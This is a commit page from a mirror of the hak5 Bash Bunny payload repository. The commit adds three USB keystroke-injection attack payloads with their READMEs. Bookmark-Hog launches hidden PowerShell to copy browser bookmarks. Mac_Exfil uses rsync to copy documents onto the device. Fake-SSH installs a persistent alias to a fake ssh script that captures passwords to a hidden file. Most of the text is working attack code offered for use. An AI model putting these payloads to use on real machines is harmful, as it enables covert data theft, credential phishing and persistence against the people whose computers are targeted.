hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/546/head
atomic 2022-08-30 18:39:55 -04:00 committed by GitHub
parent a59fbe93c7 8e322706bc
commit f864ad8323
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 414 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

47
payloads/library/exfiltration/Bookmark-Hog/BBB.ps1 Normal file
View File

@ -0,0 +1,47 @@
#Bookmark-Hog
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt"
$TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR"
}
# See if file is a thing
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2"
}

104
payloads/library/exfiltration/Bookmark-Hog/README.md Normal file
View File

@ -0,0 +1,104 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the bash bunny in the loot directory
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Let the magic happen
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

22
payloads/library/exfiltration/Bookmark-Hog/payload.txt Normal file
View File

@ -0,0 +1,22 @@
# Title: Bookmark-Hog
# Description: This payload is meant to exfiltrate bookmarks to the bash bunny.
# Author: atomiczsec
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')"
QUACK ENTER

45
payloads/library/exfiltration/Mac_Exfil/payload.txt Executable file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# Title: Mac_Exfil
# Description: Exfiltrates files from logged in users Documents and Desktop folders
# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
# Target: macOS
# Dependencies: none
#
# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot"
LED SETUP
ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267
QUACK GUI SPACE
QUACK DELAY 500
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
LED STAGE1
QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot"
QUACK ENTER
QUACK DELAY 2000
# Sync filesystem
# By default, the Linux kernel writes data to disk asynchronously.
# Writes are buffered (cached) in memory, and written to the storage device at the optimal time.
# The sync command forces an immediate write of all cached data to disk.
# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable,
# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT)
sync
QUACK DELAY 2000
LED STAGE2
QUACK STRING "diskutil eject BUNNY && killall Terminal"
QUACK ENTER
QUACK DELAY 1000
LED STAGE3
# LED payload complete
LED W FAST
mount /dev/mmcblk0p1 /mnt
files=$(find /mnt/loot -type f | wc -l)
# debug=$(find /mnt/loot -type f)
# DEBUG "switch-1-debug" "$files:$debug"
umount /mnt
if [ "$files" != "0" ]; then
LED FINISH
else
LED FAIL
fi

18
payloads/library/exfiltration/Mac_Exfil/readme.md Normal file
View File

@ -0,0 +1,18 @@
# Mac_Exfil for the BashBunny
* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
* Version: Version 1.0
* Target: macOS
## Description
A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple | Executing Payload |
| Green | Successfully grabbed files |
| Red | Did not get files |

44
payloads/library/phishing/fake-ssh/README.md Normal file
View File

@ -0,0 +1,44 @@
# Fake SSH
- Title: Fake SSH
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Phishing
## Description
1) Copies the "ssh" command spoofing program to the user's home directory.
2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
3) When the user executes the command "ssh" in a terminal, the spoofing program :
- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
```
From "ssh-phishing.sh" change the values of the following constants if necessary :
```bash
readonly MAXIMUM_ATTEMPTS=3
```
From "ssh-phishing.sh", change the payload if you wish :
```bash
##
# <YOUR-PAYLOAD>
##
/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
##
# </YOUR-PAYLOAD>
##
```

86
payloads/library/phishing/fake-ssh/payload.txt Normal file
View File

@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Fake-SSH
#
# Description:
# This program creates a fake "ssh"
# command by defining an persistent alias.
#
# Author: TW-D
# Version: 1.0
# Category: Phishing
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 7000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ~/.ssh_phishing.sh"
Q ENTER
Q DELAY 1500
Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

48
payloads/library/phishing/fake-ssh/ssh-phishing.sh Normal file
View File

@ -0,0 +1,48 @@
#!/bin/bash
#
# Fake-SSH
#
# This program imitates the behavior
# of the "ssh" command.
#
readonly MAXIMUM_ATTEMPTS=3
attempts() {
/bin/echo -n "${1}'s password: "
read -r -s ssh_password
/bin/echo ""
/bin/echo "echo \"${ssh_password}\"" > "${SSH_ASKPASS}"
if ( /bin/setsid --wait /usr/bin/ssh -o ConnectTimeout=5 -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" "${1}" "exit" > /dev/null 2>&1 ); then
##
# <YOUR-PAYLOAD>
##
/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
##
# </YOUR-PAYLOAD>
##
/bin/setsid --wait /usr/bin/ssh -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" $2 2> /dev/null
/bin/rm "${SSH_ASKPASS}"
exit 0
fi
/bin/echo "Permission denied, please try again."
}
if [ "${#}" -eq 0 ]; then
/usr/bin/ssh
else
for destination in "${@}"; do
if [[ "${destination}" =~ "@" ]]; then
export SSH_ASKPASS="/tmp/.askpass_script.sh"
/bin/echo "" > "${SSH_ASKPASS}"
chmod +x "${SSH_ASKPASS}"
for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
attempts "${destination}" "${*}"
done
/bin/echo "${destination}: Permission denied (publickey,password,keyboard-interactive)."
/bin/rm "${SSH_ASKPASS}"
exit 0
fi
done
/usr/bin/ssh "${@}"
fi